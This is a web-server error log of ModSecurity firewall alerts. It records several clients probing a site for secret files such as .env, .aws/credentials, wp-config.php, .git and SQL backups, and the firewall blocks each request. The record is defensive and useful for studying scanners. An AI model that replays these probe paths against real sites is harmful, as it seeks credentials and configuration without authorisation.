[Fri Jan 17 19:12:40.635656 2025] [:error] [pid 528892] [client 109.202.99.36:64319] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z4qdmOAjZTT9fswITbPSgAAAAAc"]
[Fri Jan 17 19:12:40.635897 2025] [:error] [pid 528892] [client 109.202.99.36:64319] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/database.sql"] [unique_id "Z4qdmOAjZTT9fswITbPSgAAAAAc"]
[Fri Jan 17 19:12:40.637466 2025] [:error] [pid 529310] [client 109.202.99.36:13925] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z4qdmFztsD1tnk24nGpE5AAAAAs"]
[Fri Jan 17 19:12:40.637796 2025] [:error] [pid 529310] [client 109.202.99.36:13925] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z4qdmFztsD1tnk24nGpE5AAAAAs"]
[Fri Jan 17 19:12:40.638033 2025] [:error] [pid 529310] [client 109.202.99.36:13925] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/service.pwd"] [unique_id "Z4qdmFztsD1tnk24nGpE5AAAAAs"]
[Fri Jan 17 19:12:40.895304 2025] [:error] [pid 528892] [client 109.202.99.36:23171] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4qdmOAjZTT9fswITbPSgQAAAAc"]
[Fri Jan 17 19:12:40.895595 2025] [:error] [pid 528892] [client 109.202.99.36:23171] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4qdmOAjZTT9fswITbPSgQAAAAc"]
[Fri Jan 17 19:12:40.895816 2025] [:error] [pid 528892] [client 109.202.99.36:23171] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "Z4qdmOAjZTT9fswITbPSgQAAAAc"]
[Fri Jan 17 19:12:40.926045 2025] [:error] [pid 529310] [client 109.202.99.36:52713] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4qdmFztsD1tnk24nGpE5QAAAAs"]
[Fri Jan 17 19:12:40.926199 2025] [:error] [pid 529310] [client 109.202.99.36:52713] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.svn/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.svn/ found within REQUEST_FILENAME: /.svn/wc.db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4qdmFztsD1tnk24nGpE5QAAAAs"]
[Fri Jan 17 19:12:40.926431 2025] [:error] [pid 529310] [client 109.202.99.36:52713] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4qdmFztsD1tnk24nGpE5QAAAAs"]
[Fri Jan 17 19:12:40.926604 2025] [:error] [pid 529310] [client 109.202.99.36:52713] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.svn/wc.db"] [unique_id "Z4qdmFztsD1tnk24nGpE5QAAAAs"]
[Fri Jan 17 19:12:40.957203 2025] [:error] [pid 539821] [client 109.202.99.36:19541] [client 109.202.99.36] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4qdmPXoRa1ZdBlUjfg5XQAAAAU"]
[Fri Jan 17 19:12:40.957474 2025] [:error] [pid 539821] [client 109.202.99.36:19541] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4qdmPXoRa1ZdBlUjfg5XQAAAAU"]
[Fri Jan 17 19:12:40.957651 2025] [:error] [pid 539821] [client 109.202.99.36:19541] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "Z4qdmPXoRa1ZdBlUjfg5XQAAAAU"]
[Fri Jan 17 19:12:40.975021 2025] [:error] [pid 523989] [client 109.202.99.36:30683] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z4qdmECHpC1HFoJP7KycjQAAAAE"]
[Fri Jan 17 19:12:40.975039 2025] [:error] [pid 529311] [client 109.202.99.36:62753] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4qdmJ8TDSlUb3zvsXCA-gAAAAw"]
[Fri Jan 17 19:12:40.975183 2025] [:error] [pid 523989] [client 109.202.99.36:30683] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z4qdmECHpC1HFoJP7KycjQAAAAE"]
[Fri Jan 17 19:12:40.975201 2025] [:error] [pid 529311] [client 109.202.99.36:62753] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4qdmJ8TDSlUb3zvsXCA-gAAAAw"]
[Fri Jan 17 19:12:40.975348 2025] [:error] [pid 523989] [client 109.202.99.36:30683] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "Z4qdmECHpC1HFoJP7KycjQAAAAE"]
[Fri Jan 17 19:12:40.975358 2025] [:error] [pid 529311] [client 109.202.99.36:62753] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4qdmJ8TDSlUb3zvsXCA-gAAAAw"]
[Fri Jan 17 19:12:40.993585 2025] [:error] [pid 528892] [client 109.202.99.36:19399] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z4qdmOAjZTT9fswITbPSggAAAAc"]
[Fri Jan 17 19:12:40.993880 2025] [:error] [pid 528892] [client 109.202.99.36:19399] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z4qdmOAjZTT9fswITbPSggAAAAc"]
[Fri Jan 17 19:12:40.994049 2025] [:error] [pid 528892] [client 109.202.99.36:19399] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backup.sql"] [unique_id "Z4qdmOAjZTT9fswITbPSggAAAAc"]
[Fri Jan 17 19:12:41.004340 2025] [:error] [pid 539814] [client 109.202.99.36:4315] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4qdmTJMZOCjXbz-hx4DrAAAAAI"]
[Fri Jan 17 19:12:41.004543 2025] [:error] [pid 539814] [client 109.202.99.36:4315] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4qdmTJMZOCjXbz-hx4DrAAAAAI"]
[Fri Jan 17 19:12:41.004777 2025] [:error] [pid 539814] [client 109.202.99.36:4315] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z4qdmTJMZOCjXbz-hx4DrAAAAAI"]
[Fri Jan 17 19:12:41.011950 2025] [:error] [pid 529310] [client 109.202.99.36:40907] [client 109.202.99.36] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".pwd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z4qdmVztsD1tnk24nGpE5gAAAAs"]
[Fri Jan 17 19:12:41.012252 2025] [:error] [pid 529310] [client 109.202.99.36:40907] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z4qdmVztsD1tnk24nGpE5gAAAAs"]
[Fri Jan 17 19:12:41.012414 2025] [:error] [pid 529310] [client 109.202.99.36:40907] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/_vti_pvt/authors.pwd"] [unique_id "Z4qdmVztsD1tnk24nGpE5gAAAAs"]
[Fri Jan 17 19:12:41.036300 2025] [authz_core:error] [pid 539821] [client 109.202.99.36:60299] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Fri Jan 17 19:12:41.080630 2025] [:error] [pid 523989] [client 109.202.99.36:41609] [client 109.202.99.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4qdmUCHpC1HFoJP7KycjgAAAAE"]
[Fri Jan 17 19:12:41.080801 2025] [:error] [pid 523989] [client 109.202.99.36:41609] [client 109.202.99.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4qdmUCHpC1HFoJP7KycjgAAAAE"]
[Fri Jan 17 19:12:41.080969 2025] [:error] [pid 523989] [client 109.202.99.36:41609] [client 109.202.99.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4qdmUCHpC1HFoJP7KycjgAAAAE"]
[Sat Jan 18 00:32:36.026766 2025] [:error] [pid 543585] [client 185.196.220.16:55398] [client 185.196.220.16] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z4rolIcrZEBG9rKDIzvnfwAAAAA"]
[Sat Jan 18 00:32:36.027488 2025] [:error] [pid 543585] [client 185.196.220.16:55398] [client 185.196.220.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z4rolIcrZEBG9rKDIzvnfwAAAAA"]
[Sat Jan 18 00:32:36.027965 2025] [:error] [pid 543585] [client 185.196.220.16:55398] [client 185.196.220.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z4rolIcrZEBG9rKDIzvnfwAAAAA"]
[Sat Jan 18 06:00:29.116903 2025] [:error] [pid 546610] [client 36.70.101.74:15959] [client 36.70.101.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z4s1bY9g9vDLxvW-VZuuxQAAAAc"]
